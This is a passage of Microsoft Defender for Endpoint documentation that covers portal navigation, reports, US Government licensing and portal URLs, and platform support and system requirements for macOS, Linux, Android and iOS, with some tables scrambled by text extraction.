To learn more, see Microsoft Secure Score.
Learning hub Navigates to a list of learning paths that you can access to learn more
about Microsoft 365 security capabilities.
Trials Navigates to a list of free Microsoft 365 trial subscriptions you can start.
Starting a trial helps you make informed decisions about purchases or
upgrades. Certain terms and conditions apply. See Microsoft 365 trial
terms and conditions .
Partner catalog If you're looking for a Microsoft partner to help you with your security
and other settings, check out the lists of partners in this catalog.
Assets > Devices Navigates to your list of devices that are onboarded to Defender for
Endpoint. Provides information about devices, such as their exposure
and risk levels.
To learn more, see Device inventory.
Endpoints > Navigates to a dashboard with cards that show your current security
Configuration state with links to improve your score, set up your capabilities, onboard
management > devices, and learn more about your capabilities.
Dashboard
Reports Navigates to your reports, such as your Threat protection report, Device
health and compliance report and your Web protection report.
Health Includes links to the Service health and Message center.
Health > Service Navigates to the Service health page in the Microsoft 365 admin center.
health This page enables you to view health status across all the services
Navigation bar item available with your organization's subscriptions.
Description
Health > Message Navigates to the Message center in the Microsoft 365 admin center. The
center Message center provides information about planned changes. Each
message describes what's coming, how it might affect users, and how to
manage changes.
Permissions & roles Enables you to grant permissions to use the Microsoft Defender portal.
Permissions are granted through roles in Microsoft Entra ID. Select a
role, and a flyout pane appears. The flyout contains a link to Microsoft
Entra ID where you can add or remove members in a role group.
To learn more, see Manage portal access using role-based access

control.
Settings Navigates to general settings for your Microsoft Defender portal (listed
as Security center) and Defender for Endpoint (listed as Endpoints).
To learn more, see Settings.
More resources Displays a list of more portals and centers, such as Microsoft Entra ID
and the Microsoft Purview compliance portal.
To learn more, see Microsoft security portals and admin centers.
 Tip
To learn more, see the Microsoft Defender portal overview.
View and manage incidents & alerts

When you sign into the Microsoft Defender portal, make sure to view and manage your
incidents and alerts. Start with your Incidents list. The following image shows a list of
incidents, including one with high severity, and another with medium severity.
Select an incident to view details about the incident. Details include what alerts were
triggered, how many devices and users were affected, and other details. The following
image shows an example of incident details.
Use the Alerts, Devices, and Users tabs to view more information, such as the alerts that
were triggered, devices that were affected, and user accounts that were affected. From
there, you can take manual response actions, such as isolating a device, stopping and
quarantining a file, and so on.
 Tip
To learn more about using the Incident view, see Manage incidents.
Manage devices
To view and manage your organization's devices, in the navigation bar, under Assets,
select Devices. You see a list of devices. The list includes devices for which alerts were
generated. By default, the data shown is for the past 30 days, with the most recent items
listed first. Select a device to view more information about it. A flyout pane opens, as
shown in the following image:
The flyout pane displays details, such as any active alerts for the device, and includes
links to take action, such as isolating a device.
If there are active alerts on the device, you can view them in the flyout pane. Select an
individual alert to view more details about it. Or, take an action, such as Isolate device,
so you can investigate the device further while minimizing the risk of infecting other
devices.
 Tip
To learn more, see Investigate devices in the Defender for Endpoint devices list.
View reports
In Defender for Endpoint Plan 1, several reports are available in the Microsoft Defender
portal. To access your reports, follow these steps:
1. Go to the Microsoft Defender portal (https://security.microsoft.com ) and sign in.
2. In the navigation bar, choose Reports.
3. Select a report in the list. Reports include:

Threat protection report
Device health report
Web protection report
 Tip
For more information, see Threat protection reports.

To access your Threat protection report, in the Microsoft Defender portal, choose
Reports, and then choose Threat protection. The Threat Protection report shows alert
trends, status, categories, and more. Views are arranged in two columns: Alert trends
and Alert status, as shown in the following image:
Scroll down to see all the views in each list.
By default, the views in the Alert trends column display data for the past 30 days,
but you can set a view to display data for the last three months, last six months, or
a custom time range (up to 180 days).
The views in the Alert status column are a snapshot for the previous business day.
 Tip
To learn more, see Threat protection report in Defender for Endpoint.
Device health report

To access your Device health report, in the Microsoft Defender portal, choose Reports,
and then choose Device health. The Device health report shows health state and
antivirus across devices in your organization. Similar to the Threat protection report,
views are arranged in two columns: Device trends and Device summary, as shown in
the following image:
Scroll down to see all the views in each list. By default, the views in the Device trends
column display data for the past 30 days, but you can change a view to display data for
the last three months, last six months, or a custom time range (up to 180 days). The
Device summary views are snapshots for the previous business day.
 Tip
To learn more, see Device health.
Web protection report

To access your Device health report, in the Microsoft Defender portal, choose Reports,
and then choose Web protection. The Web protection report shows detections over
time, such as malicious URLs and attempts to access blocked URLs, as shown in the
following image:

Scroll down to see all the views in the Web protection report. Some views include links
that enable you to view more details, configure your threat protection features, and
even manage indicators that serve as exceptions in Defender for Endpoint.
 Tip
To learn more, see Web protection.
Next steps
Manage Microsoft Defender for Endpoint Plan 1
 Tip
Feedback

Microsoft Defender for Endpoint for US
Government customers
Article • 11/29/2023
Applies to:

Microsoft Defender for Endpoint for US Government customers, built in the Azure US
Government environment, uses the same underlying technologies as Defender for
Endpoint in Azure Commercial.
This offering is available to GCC, GCC High, and DoD customers and is based on the
same prevention, detection, investigation, and remediation as the commercial version.
However, there are some differences in the availability of capabilities for this offering.
７ Note
If you are a GCC customer using Defender for Endpoint in Commercial, please refer
to the public documentation pages.
Microsoft Defender for Endpoint for US Government customers requires one of the
following Microsoft volume licensing offers:
Desktop licensing
ﾉ Expand table
GCC GCC High DoD
Microsoft 365 GCC G5 Microsoft 365 E5 for GCC High Microsoft 365 G5 for DOD
Microsoft 365 G5 Security Microsoft 365 G5 Security for Microsoft 365 G5 Security for
GCC GCC High DOD
Microsoft Defender for Microsoft Defender for Endpoint Microsoft Defender for
Endpoint - GCC for GCC High Endpoint for DOD
GCC GCC High DoD
Windows 10 Enterprise E5 Windows 10 Enterprise E5 for Windows 10 Enterprise E5 for

GCC GCC High DOD
Server licensing
ﾉ Expand table
GCC GCC High DoD
Microsoft Defender for Microsoft Defender for Endpoint Microsoft Defender for
Endpoint Server GCC Server for GCC High Endpoint Server for DOD
Microsoft Defender for Microsoft Defender for servers - Microsoft Defender for servers
servers Government - Government
Portal URLs
The following are the Microsoft Defender for Endpoint portal URLs for US Government
customers:
ﾉ Expand table
Customer type Portal URL
GCC https://security.microsoft.com
GCC High https://security.microsoft.us
DoD https://security.apps.mil
７ Note
If you are a GCC customer and in the process of moving from Microsoft Defender
for Endpoint commercial to GCC, use https://transition.security.microsoft.com
to access your Microsoft Defender for Endpoint commercial data.
Endpoint versions
Standalone OS versions
The following OS versions are supported:
ﾉ Expand table
OS version GCC GCC High DoD
Windows 11
Windows 10, version 21H1

and above
Windows 10, version 20H2

(with KB4586853 1)
Windows 10, version 2004

(with KB4586853 1) Note: Deprecated, Note: Deprecated, Note: Deprecated,
please upgrade please upgrade please upgrade




Windows 10, version 1709 With

Note: Won't be KB4499147 1 Note: Won't be
supported Note: Deprecated, supported
please upgrade

and earlier Note: Won't be Note: Won't be Note: Won't be
supported supported supported
Windows Server 2022
Windows Server 2019 (with

KB4586839 1)
Windows Server 2016

(Modern) 2

(Modern) 2
Windows Server 2016

(Legacy) 3

(Legacy) 3

SP1 (Legacy) 3

(Legacy) 3
Windows 8 Pro (Legacy) 3

(Legacy) 3
Windows 7 SP1 Pro

(Legacy) 3
Linux
macOS
Android
iOS
Footnotes
1
The patch must be deployed prior to device onboarding in order to configure
Defender for Endpoint to the correct environment.
2 Learn about the unified modern solution for Windows 2016 and 2012 R2. If you have
previously onboarded your servers using MMA, follow the guidance provided in Server
migration to migrate to the new solution.
3
When using Microsoft Monitoring Agent you'll need to choose "Azure US
Government" under "Azure Cloud" if using the setup wizard, or if using a command line
or a script - set the "OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE" parameter to 1.
The minimum MMA supported version is 10.20.18029 (March 2020).
OS versions when using Microsoft Defender for servers

The following OS versions are supported when using Microsoft Defender for servers:
ﾉ Expand table
Windows Server 2022
Windows Server 2019
Windows Server 2016
Required connectivity settings

If a proxy or firewall is blocking all traffic by default and allowing only specific domains
through, add the domains listed in the downloadable sheet to the allowed domains list.
The following downloadable spreadsheet lists the services and their associated URLs
your network must be able to connect to. Verify there are no firewall or network-filtering
rules that would deny access to these URLs, or create an allow rule specifically for them.
ﾉ Expand table
Spreadsheet of domains list Description
Microsoft Defender for Endpoint Spreadsheet of specific DNS records for service locations,
URL list for commercial customers geographic locations, and OS for commercial customers.
Download the spreadsheet here.
URL list for Gov/GCC/DoD geographic locations, and OS for Gov/GCC/DoD
customers.
For more information, see Configure device proxy and Internet connectivity settings.
７ Note
The spreadsheet contains commercial URLs as well, make sure you check the "US
Gov" tabs.
When filtering, look for the records labeled as "US Gov" and your specific cloud
under the geography column.
API
Instead of the public URIs listed in our API documentation, you'll need to use the
following URIs:
ﾉ Expand table
Endpoint type GCC GCC High & DoD
Login https://login.microsoftonline.com https://login.microsoftonline.us
Defender for https://api- https://api-

Endpoint API gcc.securitycenter.microsoft.us gov.securitycenter.microsoft.us
Feature parity with commercial

Defender for Endpoint for US Government customers doesn't have complete parity with
the commercial offering. While our goal is to deliver all commercial features and
functionality to our US Government customers, there are some capabilities not yet
available we want to highlight.
These are the known gaps:
ﾉ Expand table
Feature name GCC GCC High DoD
Microsoft Secure Score 1
Microsoft Defender for Endpoint Security Configuration Management
７ Note
1
While Microsoft Secure Score is available for GCC customers, there are some
security recommendations that aren't available.
These are the features and known gaps for Mobile Threat Defense (Microsoft Defender
for Endpoint on Android & iOS):
ﾉ Expand table
Feature name GCC GCC High DoD
Reports: Web content filtering
Reports: Device health
Web Protection (Anti-Phishing and custom indicators)
Malware Protection (Android-Only)
Jailbreak Detection (iOS-Only)
Conditional Access/Conditional Launch
Support for MAM
Privacy Controls
1
Microsoft Defender Vulnerability Management core capabilities
(included in Defender for Endpoint Plan 2)
Microsoft Defender Vulnerability Management premium capabilities
７ Note
1
The Defender Vulnerability Management Report inaccuracy functionality is not
available for GCC customers.
 Tip
Feedback

Microsoft Defender for Endpoint on
other platforms
Article • 02/22/2023
Applies to:
Microsoft Defender for Endpoint Plan 1 and Plan 2

Microsoft has been on a journey to extend its industry leading endpoint security
capabilities beyond Windows and Windows Server to macOS, Linux, Android, and iOS.
Organizations face threats across a variety of platforms and devices. Our teams have
committed to building security solutions not just for Microsoft, but also from Microsoft
to enable our customers to protect and secure their heterogeneous environments. We're
listening to customer feedback and partnering closely with our customers to build
solutions that meet their needs.
With Microsoft Defender for Endpoint, customers benefit from a unified view of all
threats and alerts in the Microsoft Defender portal, across Windows and non-Windows
platforms, enabling them to get a full picture of what's happening in their environment,
which empowers them to more quickly assess and respond to threats.
７ Note
Microsoft Defender for Endpoint doesn't support native compute workloads in

Amazon Web Services (AWS) and Google Cloud Platform (GCP).
Microsoft Defender for Endpoint on macOS

Microsoft Defender for Endpoint on macOS offers antivirus, endpoint detection and
response (EDR), and vulnerability management capabilities for the three latest released
versions of macOS. Customers can deploy and manage the solution through Microsoft
Intune and Jamf. Just like with Microsoft Office applications on macOS, Microsoft Auto
Update is used to manage Microsoft Defender for Endpoint on Mac updates. For
information about the key features and benefits, read our announcements .
For more details on how to get started, visit the Defender for Endpoint on macOS
documentation.
７ Note
The following capabilities are not currently supported on macOS endpoints:
Security Management for Microsoft Defender for Endpoint

Microsoft Defender for Endpoint on Linux offers preventative antivirus (AV), endpoint
detection and response (EDR), and vulnerability management capabilities for Linux
servers. This includes a full command line experience to configure and manage the
agent, initiate scans, and manage threats. We support recent versions of the six most
common Linux Server distributions: RHEL 7.2+, CentOS Linux 7.2+, Ubuntu 16 LTS, or
higher LTS, SLES 12+, Debian 9+, and Oracle Linux 7.2. Microsoft Defender for Endpoint
on Linux can be deployed and configured using Puppet, Ansible, or using your existing
Linux configuration management tool. For information about the key features and
benefits, read our announcements .
For more details on how to get started, visit the Microsoft Defender for Endpoint on
Linux documentation.
７ Note
The following capabilities are not currently supported on Linux endpoints:
Data loss prevention

Security Management for Microsoft Defender for Endpoint

Microsoft Defender for Endpoint on Android is our mobile threat defense solution for
devices running Android 6.0 and higher. Both Android Enterprise (Work Profile) and
Device Administrator modes are supported. On Android, we offer web protection, which
includes anti-phishing, blocking of unsafe connections, and setting of custom indicators.
The solution scans for malware and potentially unwanted applications (PUA) and offers
additional breach prevention capabilities through integration with Microsoft Intune and
Conditional Access. For information about the key features and benefits, read our
announcements .
For more details on how to get started, visit the Microsoft Defender for Endpoint on
Android documentation.

Microsoft Defender for Endpoint on iOS is our mobile threat defense solution for
devices running iOS 11.0 and higher. Devices that are registered within a customer's
tenant (enrolled or unenrolled) are supported. Both supervised and unsupervised
enrolled devices are supported. On iOS, we offer web protection, which includes anti-
phishing, blocking unsafe connections and setting custom indicators, and jailbreak
detection. For more information about the key features and benefits, read our
announcements .
For more details on how to get started, visit the Microsoft Defender for Endpoint on iOS
documentation.
Eligible Licensed Users may use Microsoft Defender for Endpoint on up to five
concurrent devices. Microsoft Defender for Endpoint is also available for purchase from
a Cloud Solution Provider (CSP).
Customers can obtain Microsoft Defender for Endpoint on macOS through a standalone
Microsoft Defender for Endpoint license, as part of Microsoft 365 A5/E5, or Microsoft
365 Security.
Recently announced capabilities of Microsoft Defender for Endpoint on Android and iOS
are included in the above mentioned offers as part of the five qualified devices for
eligible licensed users.
Defender for Endpoint on Linux is available through the Defender for Endpoint Server
SKU that is available for both commercial and education customers.
Please contact your account team or CSP for pricing and additional eligibility
requirements.
 Tip
Feedback

Linux
Article • 11/29/2023
Applies to:

This topic describes how to install, configure, update, and use Microsoft Defender for
Endpoint on Linux.
Ｕ Caution
Running other third-party endpoint protection products alongside Microsoft

Defender for Endpoint on Linux is likely to lead to performance problems and
unpredictable side effects. If non-Microsoft endpoint protection is an absolute
requirement in your environment, you can still safely take advantage of Defender
for Endpoint on Linux EDR functionality after configuring the antivirus functionality
to run in Passive mode.
How to install Microsoft Defender for Endpoint

on Linux
Microsoft Defender for Endpoint for Linux includes anti-malware and endpoint
detection and response (EDR) capabilities.
Prerequisites
Access to the Microsoft Defender portal
Linux distribution using the systemd system manager
７ Note
Linux distribution using system manager, except for RHEL/CentOS 6.x support
both SystemV and Upstart.
Beginner-level experience in Linux and BASH scripting
Administrative privileges on the device (in case of manual deployment)
７ Note
Microsoft Defender for Endpoint on Linux agent is independent from OMS agent.
Microsoft Defender for Endpoint relies on its own independent telemetry pipeline.
Installation instructions
There are several methods and deployment tools that you can use to install and
configure Microsoft Defender for Endpoint on Linux.
In general you need to take the following steps:
Ensure that you have a Microsoft Defender for Endpoint subscription.

Deploy Microsoft Defender for Endpoint on Linux using one of the following
deployment methods:
The command-line tool:
Manual deployment
Third-party management tools:
Deploy using Puppet configuration management tool
Deploy using Ansible configuration management tool
Deploy using Chef configuration management tool
Deploy using Saltstack configuration management tool If you experience
any installation failures, refer to Troubleshooting installation failures in
７ Note
It is not supported to install Microsoft Defender for Endpoint in any other location
other than the default install path.
Microsoft Defender for Endpoint on Linux creates an "mdatp" user with random
UID and GID. If you want to control the UID and GID, create an "mdatp" user prior
to installation using the "/usr/sbin/nologin" shell option. For example:
mdatp:x:UID:GID::/home/mdatp:/usr/sbin/nologin .
System requirements
Supported Linux server distributions and x64 (AMD64/EM64T) and x86_64 versions:
Red Hat Enterprise Linux 6.7 or higher (In preview)
Red Hat Enterprise Linux 7.2 or higher
Red Hat Enterprise Linux 8.x
Red Hat Enterprise Linux 9.x
CentOS 6.7 or higher (In preview)
CentOS 7.2 or higher
Ubuntu 16.04 LTS or higher LTS
Debian 9 - 12
SUSE Linux Enterprise Server 12 or higher
Oracle Linux 7.2 or higher
Oracle Linux 8.x
Oracle Linux 9.x
Amazon Linux 2
Amazon Linux 2023
Fedora 33 or higher
Rocky 8.7 and higher
Alma 8.4 and higher
Mariner 2
７ Note
Distributions and version that are not explicitly listed are unsupported
(even if they are derived from the officially supported distributions). With
RHEL 6 support for 'extended end of life' coming to an end by June 30,
2024; MDE Linux support for RHEL 6 will also be deprecated by June 30,
2024 MDE Linux version 101.23082.0011 is the last MDE Linux release
supporting RHEL 6.7 or higher versions (does not expire before June 30,
2024). Customers are advised to plan upgrades to their RHEL 6
infrastructure aligned with guidance from Red Hat.
List of supported kernel versions
７ Note
Microsoft Defender for Endpoint on Red Hat Enterprise Linux and CentOS -
6.7 to 6.10 is a Kernel based solution. You must verify that the kernel version is
supported before updating to a newer kernel version. Microsoft Defender for
Endpoint for all other supported distributions and versions is kernel-version-
agnostic. With a minimal requirement for the kernel version to be at or
greater than 3.10.0-327.
The fanotify kernel option must be enabled

Red Hat Enterprise Linux 6 and CentOS 6:
For 6.7: 2.6.32-573.* (except 2.6.32-573.el6.x86_64)
For 6.8: 2.6.32-642.*
For 6.9: 2.6.32-696.* (except 2.6.32-696.el6.x86_64)
For 6.10:
2.6.32-754.10.1.el6.x86_64
2.6.32-754.11.1.el6.x86_64
2.6.32-754.12.1.el6.x86_64
2.6.32-754.14.2.el6.x86_64
2.6.32-754.15.3.el6.x86_64
2.6.32-754.17.1.el6.x86_64
2.6.32-754.18.2.el6.x86_64
2.6.32-754.2.1.el6.x86_64
2.6.32-754.22.1.el6.x86_64
2.6.32-754.23.1.el6.x86_64
2.6.32-754.24.2.el6.x86_64
2.6.32-754.24.3.el6.x86_64
2.6.32-754.25.1.el6.x86_64
2.6.32-754.27.1.el6.x86_64
2.6.32-754.28.1.el6.x86_64
2.6.32-754.29.1.el6.x86_64
2.6.32-754.29.2.el6.x86_64
2.6.32-754.3.5.el6.x86_64
2.6.32-754.30.2.el6.x86_64
2.6.32-754.33.1.el6.x86_64
2.6.32-754.35.1.el6.x86_64
2.6.32-754.39.1.el6.x86_64
2.6.32-754.41.2.el6.x86_64
2.6.32-754.43.1.el6.x86_64
2.6.32-754.47.1.el6.x86_64
2.6.32-754.48.1.el6.x86_64
2.6.32-754.49.1.el6.x86_64
2.6.32-754.6.3.el6.x86_64
2.6.32-754.9.1.el6.x86_64
７ Note
After a new package version is released, support for the previous two versions
is reduced to technical support only. Versions older than that which are listed
in this section are provided for technical upgrade support only.
Ｕ Caution
Running Defender for Endpoint on Linux side by side with other fanotify -
based security solutions is not supported. It can lead to unpredictable results,
including hanging the operating system. If there are any other applications on
the system that use fanotify in blocking mode, applications are listed in the
conflicting_applications field of the mdatp health command output. The
Linux FAPolicyD feature uses fanotify in blocking mode, and is therefore

unsupported when running Defender for Endpoint in active mode. You can
still safely take advantage of Defender for Endpoint on Linux EDR functionality
after configuring the antivirus functionality Real Time Protection Enabled to
Passive mode.
Disk space: 2 GB
７ Note
An additional 2 GB disk space might be needed if cloud diagnostics are
enabled for crash collections.
/opt/microsoft/mdatp/sbin/wdavdaemon requires executable permission. For

more information, see "Ensure that the daemon has executable permission" in
Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux.
Cores: 2 minimum, 4 preferred
Memory: 1 GB minimum, 4 preferred
７ Note
Please make sure that you have free disk space in /var.
List of supported filesystems for RTP, Quick, Full and Custom Scan.
ﾉ Expand table
RTP, Quick, Full Scan Custom Scan
btrfs All filesystems supported for RTP, Quick, Full Scan
ecryptfs Efs
ext2 S3fs
ext3 Blobfuse
ext4 Lustr
fuse glustrefs
fuseblk Afs
jfs sshfs
nfs (v3 only) cifs
overlay smb
ramfs gcsfuse
reiserfs sysfs
tmpfs
udf
RTP, Quick, Full Scan Custom Scan
vfat
xfs
After you've enabled the service, you m need to configure your network or firewall to
allow outbound connections between it and your endpoints.
Audit framework ( auditd ) must be enabled.
７ Note
System events captured by rules added to /etc/audit/rules.d/ will add to

audit.log (s) and might affect host auditing and upstream collection. Events
added by Microsoft Defender for Endpoint on Linux will be tagged with mdatp
key.
External package dependency

The following external package dependencies exist for the mdatp package:
The mdatp RPM package requires "glibc >= 2.17", "audit", "policycoreutils",
"semanage" "selinux-policy-targeted", "mde-netfilter"
For RHEL6 the mdatp RPM package requires "audit", "policycoreutils", "libselinux",
"mde-netfilter"
For DEBIAN the mdatp package requires "libc6 >= 2.23", "uuid-runtime", "auditd",
"mde-netfilter"
The mde-netfilter package also has the following package dependencies:
For DEBIAN the mde-netfilter package requires "libnetfilter-queue1", "libglib2.0-0"

For RPM the mde-netfilter package requires "libmnl", "libnfnetlink",
"libnetfilter_queue", "glib2"
If the Microsoft Defender for Endpoint installation fails due to missing dependencies
errors, you can manually download the pre-requisite dependencies.
Configuring Exclusions
When adding exclusions to Microsoft Defender Antivirus, you should be mindful of
Common Exclusion Mistakes for Microsoft Defender Antivirus.
Network connections
that your network must be able to connect to. You should ensure that there are no
firewall or network filtering rules that would deny access to these URLs. If there are, you
might need to create an allow rule specifically for them.
ﾉ Expand table
Download the spreadsheet here .
customers.
７ Note
For a more specific URL list, see Configure proxy and internet connectivity
settings.
Defender for Endpoint can discover a proxy server by using the following discovery
methods:
Transparent proxy
Manual static proxy configuration
If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is
permitted in the previously listed URLs. For transparent proxies, no additional
configuration is needed for Defender for Endpoint. For static proxy, follow the steps in
Manual Static Proxy Configuration.
２ Warning
PAC, WPAD, and authenticated proxies are not supported. Ensure that only a static
proxy or transparent proxy is being used.
SSL inspection and intercepting proxies are also not supported for security reasons.
Configure an exception for SSL inspection and your proxy server to directly pass
through data from Defender for Endpoint on Linux to the relevant URLs without
interception. Adding your interception certificate to the global store will not allow
for interception.
For troubleshooting steps, see Troubleshoot cloud connectivity issues for Microsoft
Defender for Endpoint on Linux.
How to update Microsoft Defender for

Endpoint on Linux
Microsoft regularly publishes software updates to improve performance, security, and to
deliver new features. To update Microsoft Defender for Endpoint on Linux, refer to
Deploy updates for Microsoft Defender for Endpoint on Linux.
How to configure Microsoft Defender for

Endpoint on Linux
Guidance for how to configure the product in enterprise environments is available in Set
preferences for Microsoft Defender for Endpoint on Linux.
Common Applications to Microsoft Defender

for Endpoint can impact
High I/O workloads from certain applications can experience performance issues when
Microsoft Defender for Endpoint is installed. These include applications for developer
scenarios like Jenkins and Jira, and database workloads like OracleDB and Postgres. If
experiencing performance degradation, consider setting exclusions for trusted
applications, keeping Common Exclusion Mistakes for Microsoft Defender Antivirus in
mind. For additional guidance, consider consulting documentation regarding antivirus
exclusions from third party applications.
Resources
For more information about logging, uninstalling, or other topics, see Resources.
Related articles
Protect your endpoints with Defender for Cloud's integrated EDR solution:
Connect your non-Azure machines to Microsoft Defender for Cloud
Turn on network protection for Linux
 Tip
Feedback

Android
Article • 08/15/2023
Applies to:

This topic describes how to install, configure, update, and use Defender for Endpoint on
Android.
Ｕ Caution
Running other third-party endpoint protection products alongside Defender for

Endpoint on Android is likely to cause performance problems and unpredictable
system errors.

on Android
Prerequisites
For end users:
The end user must be assigned a Microsoft Intune license. For more information
on how to assign licenses, see Assign licenses to users.
The users of the app must be assigned a Microsoft Defender for Endpoint
license. For more information on how to assign licenses, see Microsoft Defender
for Endpoint licensing requirements.
Intune Company Portal app can be downloaded from Google Play and is
available on the Android device.
Additionally, device(s) can be enrolled via the Intune Company Portal app to
enforce Intune device compliance policies.
For Administrators:
Access to the Microsoft Defender portal.
Access to the Microsoft Intune admin center to:

Deploy the app to enrolled user groups in your organization.
Configure Microsoft Defender for Endpoint risk signals in app protection
policy.
７ Note
Microsoft Defender for Endpoint now extends protection to an
organization's data within a managed application (MAM) for devices
that are not enrolled using mobile device management (MDM), but are
using Intune to manage mobile applications. It also extends this support
to customers who use other enterprise mobility management solutions,
while still using Intune for mobile application management (MAM).
In addition, Microsoft Defender for Endpoint already supports devices
that are enrolled using Intune mobile device management (MDM).
Network Requirements
For Microsoft Defender for Endpoint on Android to function when connected to a
network the firewall/proxy will need to be configured to enable access to Microsoft
Defender for Endpoint service URLs.
System Requirements
Mobile phones and tablets running Android 8.0 and above. Mobile phones
running Android go and other mobile devices running Android are not currently
supported.
Intune Company Portal app is downloaded from Google Play and installed.
Device enrollment is required for Intune device compliance policies to be enforced.
７ Note
Microsoft Defender for Endpoint on Android isn't supported on userless or shared

devices.
Microsoft Defender for Endpoint on Android supports installation on both modes of
enrolled devices - the legacy Device Administrator and Android Enterprise modes.
Currently, Personally-owned devices with work profile, Corporate-owned devices with
work profile, and Corporate-owned fully managed user device enrollments are
supported in Android Enterprise. Support for other Android Enterprise modes will be
announced when ready.
Deployment of Microsoft Defender for Endpoint on Android is via Microsoft Intune

(MDM). For more information, see Deploy Microsoft Defender for Endpoint on
Android with Microsoft Intune.
Installation of Microsoft Defender for Endpoint on devices that are not enrolled
using Intune mobile device management (MDM), see Configure Microsoft
Defender for Endpoint risk signals in app protection policy (MAM).
７ Note
Microsoft Defender for Endpoint on Android is available on Google Play now.
You can connect to Google Play from Intune to deploy Microsoft Defender for
Endpoint app, across Device Administrator and Android Enterprise enrollment
modes.
How to Configure Microsoft Defender for

Endpoint on Android
Guidance on how to configure Microsoft Defender for Endpoint on Android features is
available in Configure Microsoft Defender for Endpoint on Android features.
Related topics
Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune
Configure Microsoft Defender for Endpoint on Android features
Mobile Application Management (MAM) basics
 Tip
Feedback

Article • 02/22/2024
Applies to:

Microsoft Defender for Endpoint on iOS offers protection against phishing and unsafe
network connections from websites, emails, and apps. All alerts will be available through
a single pane of glass in the Microsoft Defender portal. The portal gives security teams a
centralized view of threats on iOS devices along with other platforms.
Ｕ Caution
Running other third-party endpoint protection products alongside Defender for

Endpoint on iOS is likely to cause performance problems and unpredictable system
errors.
Prerequisites
For End Users

Microsoft Defender for Endpoint license assigned to the end user(s) of the app.
See Microsoft Defender for Endpoint licensing requirements.
For enrolled devices:

Device(s) are enrolled via the Intune Company Portal app to enforce Intune
device compliance policies. This requires the end user to be assigned a
Microsoft Intune license.
Intune Company Portal app can be downloaded from the Apple App Store .
７ Note
Apple does not allow redirecting users to download other apps from the app
store so this step needs to be done by the user before onboarding to
Microsoft Defender for Endpoint app.
Device(s) are registered with Microsoft Entra ID. This requires the end user to be
signed in through Microsoft Authenticator app .
For unenrolled devices: Device(s) are registered with Microsoft Entra ID. This
requires the end user to be signed in through Microsoft Authenticator app .
For more information on how to assign licenses, see Assign licenses to users.
For Administrators
Access to the Microsoft Defender portal.
Access to the Microsoft Intune admin center , to:
Deploy the app to enrolled user groups in your organization.
Configure Microsoft Defender for Endpoint risk signals in app protection policy
(MAM)
７ Note
Microsoft Defender for Endpoint now extends protection to an
organization's data within a managed application for those who aren't
using mobile device management (MDM) but are using Intune to
manage mobile applications. It also extends this support to customers
who use other enterprise mobility management solutions, while still
using Intune for mobile application management (MAM).
In addition, Microsoft Defender for Endpoint already supports devices
that are enrolled using Intune mobile device management (MDM).
System Requirements
iOS device running iOS 15.0 and above. iPads are also supported.
The device is either enrolled with the Intune Company Portal app or is registered
with Microsoft Entra ID through Microsoft Authenticator with the same account.
７ Note
Microsoft Defender for Endpoint on iOS isn't supported on user-less or shared
devices.
Microsoft Defender for Endpoint on iOS isn't supported currently while using
iOS User Enrollment.
Deployment of Microsoft Defender for Endpoint on iOS can be done via Microsoft
Intune and both supervised and unsupervised devices are supported. End-users can also
directly install the app from the Apple app store .
For information on deploying on enrolled devices through Microsoft Configuration

Manager or Intune, see Deploy Microsoft Defender for Endpoint on iOS.
For information on using Defender for Endpoint in app protection policy (MAM),
see Configure app protection policy to include Defender for Endpoint risk signals
(MAM)
Resources
Stay informed about upcoming releases by visiting What's new in Microsoft
Defender for Endpoint on iOS or our blog .
Provide feedback through in-app feedback system or through the unified security
console
Next steps
Deploy Microsoft Defender for Endpoint on iOS through Intune for enrolled
devices
Configure app protection policy to include Defender for Endpoint risk signals
(MAM)
Configure Microsoft Defender for Endpoint on iOS features
Configure Conditional Access policy based on device risk score from Microsoft
Mobile Application Management (MAM) basics
 Tip
Feedback

Antivirus solution compatibility with
Article • 02/27/2024
Applies to:

The Microsoft Defender for Endpoint agent depends on Microsoft Defender Antivirus for
some capabilities such as file scanning.
） Important
Endpoint detection and response (EDR) in Defender for Endpoint does not adhere
to the Microsoft Defender Antivirus Exclusions settings.
For optimal protection, configure the following settings for devices that are onboarded
to Defender for Endpoint, whether Microsoft Defender Antivirus is the active
antimalware solution or not:
Security intelligence updates (which also updates the scan engine)

Platform Update updates
For more information, see Manage Microsoft Defender Antivirus updates and apply
baselines.
If an onboarded device is protected by a non-Microsoft anti-malware client, Microsoft

Defender Antivirus goes into passive mode. In this scenario, Microsoft Defender
Antivirus continues to receive updates, and the msmpeng.exe process is listed as a
running a service. But, it doesn't perform real-time protection scans, scheduled scans, or
on-demand scans, and and doesn't replace the running non-Microsoft antimalware
client. The Microsoft Defender Antivirus user interface is disabled. Device users can't use
Microsoft Defender Antivirus to perform on-demand scans or configure most options
such as Attack Surface Reduction (ASR) rules, Network Protection, Indicators - File/IP
address/URL/Certificates allow/block, Web Content Filtering, Controlled Folder Access,
and so forth.
For more information, see the Microsoft Defender Antivirus and Defender for Endpoint
compatibility topic.
 Tip
Feedback

evaluation lab
Article • 02/27/2024
） Important
The Microsoft Defender for Endpoint evaluation lab was deprecated in January,
2024.
Applies to:

Conducting a comprehensive security product evaluation can be a complex process

requiring cumbersome environment and device configuration before an end-to-end
attack simulation can actually be done. Adding to the complexity is the challenge of
tracking where the simulation activities, alerts, and results are reflected during the
evaluation.
The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the
complexities of device and environment configuration so that you can focus on
evaluating the capabilities of the platform, running simulations, and seeing the
prevention, detection, and remediation features in action.
https://www.microsoft.com/en-us/videoplayer/embed/RE4qLUM?postJsllMsg=true
With the simplified set-up experience, you can focus on running your own test scenarios
and the pre-made simulations to see how Defender for Endpoint performs.
You'll have full access to the powerful capabilities of the platform such as automated
investigations, advanced hunting, and threat analytics, allowing you to test the
comprehensive protection stack that Defender for Endpoint offers.
You can add Windows 10, Windows 11, Windows Server 2019, Windows Server 2016,
and Linux (Ubuntu) devices that come pre-configured to have the latest OS versions and
the right security components in place as well as Office 2019 Standard installed.
You can also install threat simulators. Defender for Endpoint has partnered with industry
leading threat simulation platforms to help you test out the Defender for Endpoint
capabilities without having to leave the portal.
Install your preferred simulator, run scenarios within the evaluation lab, and instantly see
how the platform performs - all conveniently available at no extra cost to you. You'll also
have convenient access to wide array of simulations which you can access and run from
the simulations catalog.
Before you begin

You'll need to fulfill the licensing requirements or have trial access to Microsoft
Defender for Endpoint to access the evaluation lab.
